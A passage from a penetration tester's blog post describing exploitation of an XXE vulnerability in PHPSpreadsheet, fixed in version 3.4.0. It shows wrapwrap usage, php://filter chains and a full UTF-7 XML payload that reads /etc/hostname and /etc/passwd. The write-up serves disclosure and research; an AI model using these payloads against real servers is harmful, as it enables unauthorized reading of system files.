    b"A": "convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213",
    b"a": "convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE",
    b"B": "convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000",
    b"b": "convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE",
    b"C": "convert.iconv.UTF8.CSISO2022KR",
    b"c": "convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2",
    b"D": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213",
    b"d": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5",
    # …
}

WrapWrap takes four positional arguments: the path to the target file, a prefix and a suffix (which shape the payload), and the number of bytes to extract.

python wrapwrap.py --help
usage: wrapwrap.py [-h] [-o OUTPUT] [-p PADDING_CHARACTER] [-f] path prefix suffix nb_bytes

Generates a php://filter wrapper that adds a prefix and a suffix to the contents of a file.

Example:

    $ ./wrapwrap.py /etc/passwd '<root><test>' '</test></root>' 100
    [*] Dumping 108 bytes from /etc/passwd.
    [+] Wrote filter chain to chain.txt (size=88781).
    $ php -r 'echo file_get_contents(file_get_contents("chain.txt"));'
    <root><test>root:x:0:0:root:/root:/bin/bash=0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin=0Abin:x:2:2:bin:/bin:/usr/</test></root>

positional arguments:
  path                  Path to the file
  prefix                A string to write before the contents of the file
  suffix                A string to write after the contents of the file
  nb_bytes              Number of bytes to dump. It will be aligned with 9

options:
  -h, --help            show this help message and exit
  -o, --output OUTPUT   File to write the payload to. Defaults to chain.txt
  -p, --padding-character PADDING_CHARACTER
                        Character to pad the prefix and suffix. Defaults to `M`.
  -f, --from-file       If set, prefix and suffix indicate files to load their value from, instead of the value itself

We can generate a wrapped payload for /etc/hostname like this:

python wrapwrap.py /etc/hostname "<\!ENTITY xxe '" "'>" 54
[*] Dumping 54 bytes from /etc/hostname.
[+] Wrote filter chain to chain.txt (size=49312).

The output of this command is a php://filter chain that looks something like this:

php://filter/convert.base64-encode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.quoted-printable-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|
    …
convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode|dechunk|convert.base64-decode|convert.base64-decode/resource=/etc/hostname

This gives us the final payload to read the /etc/hostname file:

<?xml version="1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
    <!ENTITY % hostname SYSTEM "PHP_FILTER_URL_GENERATED_BY_WRAPWRAP" >
    %hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
    <si>
        <t xml:space="preserve">&xxe;</t>
    </si>
</sst>
<!--encoding="UTF-8"-->

/etc/hostname via XXE

To leak other files, such as /etc/passwd, simply replace the target file path at the very end of the php://filter chain:

/etc/passwd via XXE

Conclusions

The PHPSpreadsheet team responded swiftly to the vulnerability reports submitted by Antonio Rocco Spataro and Antonio Russo, actively involving them in the remediation process. Starting from version 3.4.0, the library addresses the reported security flaws by completely reworking the affected methods, ensuring a more robust and secure implementation.

Francesco Marano
CEO | Cyber Security Consultant
www.unlock-security.it

I love making software do things other than what it was designed for! Hi, I'm Francesco, a cyber security expert with years of experience as a penetration tester. In my spare time I do security research to find new vulnerabilities, and I speak at industry events about my research. Today I lead Unlock Security, a company specializing in offensive security.
